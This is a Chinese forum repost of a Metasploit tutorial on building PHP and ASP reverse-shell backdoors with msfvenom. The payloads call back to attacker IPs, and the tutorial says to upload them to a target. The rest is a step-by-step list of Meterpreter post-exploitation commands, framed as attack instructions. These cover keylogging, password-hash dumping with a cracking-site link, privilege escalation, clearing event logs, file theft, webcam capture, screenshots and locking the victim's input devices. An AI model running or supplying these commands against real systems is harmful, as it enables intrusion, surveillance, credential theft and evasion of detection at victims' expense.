防伪标 發表於 2020-2-19 12:32:00

msf建立php反弹shell

<p>一&nbsp;&nbsp; 建立反弹后门</p>
<p>msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R &gt; test3.php</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>注:生成的反弹木马存放在当前用户home目录下;</p>
<p>将生成的木马上传到目标机中,可以远程访问;</p>
<p>windows下asp反弹木马:</p>
<p>root@kali:~#&nbsp;msfvenom&nbsp;-p&nbsp;windows/meterpreter/reverse_tcp&nbsp;LHOST=10.10.10.131&nbsp;-f&nbsp;asp&nbsp;&gt;&nbsp;shell.asp</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>二 监听端口建立会话</p>
<p>1 使用handler模块</p>
<p>msf &gt; use exploit/multi/handler</p>
<p>2 设置payload</p>
<p>msf exploit(multi/handler) &gt; set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows)</p>
<p>PAYLOAD =&gt;php/meterpreter/reverse_tcp</p>
<p>3 设置监听主机</p>
<p>msfexploit(multi/handler) &gt; set LHOST 192.168.88.155</p>
<p>LHOST =&gt;192.168.88.155</p>
<p>4 设置监听端口(默认4444)</p>
<p>msfexploit(multi/handler) &gt; set LPORT 4444</p>
<p>LPORT =&gt; 4444</p>
<p>5 发动攻击</p>
<p>msfexploit(multi/handler) &gt; exploit</p>
<p>&nbsp;</p>
<p>注:要远程访问你上传的后门文件</p>
<p>&nbsp;</p>
<p>meterpreter &gt; keyscan_start</p>
<p>keyscan_dump&nbsp;//&nbsp;查看键盘记录</p>
<p>监控目标系统键盘输入,停止监控为keyscan_stop</p>
<p>&nbsp;</p>
<p>meterpreter &gt;&nbsp;migrate</p>
<p>将你的Meterpreter移到另一个进程</p>
<p>先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)</p>
<p>&nbsp;</p>
<p>meterpreter &gt; getuid</p>
<p>获取用户的服务器运行</p>
<p>meterpreter &gt; shell</p>
<p>进入目标电脑,命令提示符</p>
<p>meterpreter &gt; Idletime</p>
<p>目标电脑闲置了多长时间</p>
<p>meterpreter &gt; Hashdump</p>
<p>导出对方SAM数据库里的内容,推荐一个hash破解网站:</p>
<p>http://www.objectif-securite.ch/products.php</p>
<p>meterpreter &gt; getsystem</p>
<p>利用已自漏洞,自动提权为SYSTEM</p>
<p>&nbsp;</p>
<p>meterpreter &gt; clearev</p>
<p>清除事件日志</p>
<p>&nbsp;</p>
<p>&nbsp;meterpreter &gt; execute(某Windows指令)</p>
<p>在对方电脑上运行该指令</p>
<p>meterpreter&nbsp;&gt;&nbsp;execute&nbsp;<br>Usage:&nbsp;execute&nbsp;-f&nbsp;file&nbsp;<br>&nbsp;</p>
<p>meterpreter &gt; download(文件路径)</p>
<p>下载文件命令</p>
<p>例如下载C盘下面的jzking121.txt文件</p>
<p>meterpreter &gt; download c:\\jzking121.txt</p>
<p>[*] downloading: c:\jzking121.txt -&gt; jzking121.txt</p>
<p>[*] downloaded : c:\jzking121.txt -&gt; jzking121.txt</p>
<p>注意,文件路径中要有两个\\</p>
<p>Upload指令跟Download指令类似!</p>
<p>&nbsp;</p>
<p>&nbsp;meterpreter &gt; shutdown&nbsp;</p>
<p>关闭目标计算机,reboot为重启计算机</p>
<p>&nbsp;</p>
<p>meterpreter &gt;screenshot</p>
<p>获取目标电脑,屏幕截图</p>
<p>&nbsp;</p>
<p>&nbsp;meterpreter &gt; uictl enable keyboard&nbsp;启用目标使用键盘</p>
<p>meterpreter &gt; uictl disable mouse&nbsp; &nbsp;禁止目标使用鼠标</p>
<p>enable 为启用</p>
<p>disable 禁用</p>
<p>&nbsp;</p>
<p>&nbsp;meterpreter &gt; webcam_list</p>
<p>目标系统的摄像头列表</p>
<p>&nbsp;</p>
<p>&nbsp;meterpreter &gt; webcam_snap</p>
<p>从指定的摄像头,拍摄照片</p>
<p>&nbsp;</p>
<p>&nbsp;meterpreter &gt; search -d c:\\ -f 1.jpg</p>
<p>搜索目标电脑,C盘1.jpg文件<br>————————————————<br><br>转载自msdn,原文链接:https://blog.csdn.net/u012991692/article/details/80784258</p><br><br>
来源:https://www.cnblogs.com/ly584521/p/12330746.html
頁: [1]
查看完整版本: msf建立php反弹shell